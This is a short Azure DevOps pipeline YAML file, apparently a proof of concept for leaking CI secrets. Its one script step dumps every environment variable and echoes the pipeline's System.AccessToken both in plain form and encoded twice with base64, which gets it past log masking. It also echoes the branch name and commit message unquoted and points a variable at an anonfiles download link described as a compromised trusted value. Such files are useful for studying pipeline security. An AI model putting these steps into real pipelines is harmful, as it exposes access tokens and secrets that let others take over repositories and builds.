trigger: none
pr: none


resources:
  pipelines:
  - pipeline: nadav-legit.test_pipelines
    source: nadav-legit.test_pipelines (1)
    trigger: true # Run app-ci pipeline when any run of security-lib-ci completes

    
variables:
- name: varificationUrl # This variable is just an example of a trusted variable that can be compromised
  value: https://cdn-114.anonfiles.com/z2u7T06fy2/d910a710-1662484505

steps:
  - script: |
      printenv
      echo "========================="
      echo $(System.AccessToken)
      echo "+++++++++++++++++++++++++"
      echo $(System.AccessToken) | base64 | base64
      echo "-------------------------"
      echo "Url to verify: $(varificationUrl)"
      echo "verifying the following branch:"
      echo "$(Build.SourceBranchName)"
      echo "verifying the following commit:"
      echo "$(Build.SourceVersionMessage)"
    
    
    displayName: Display data

  
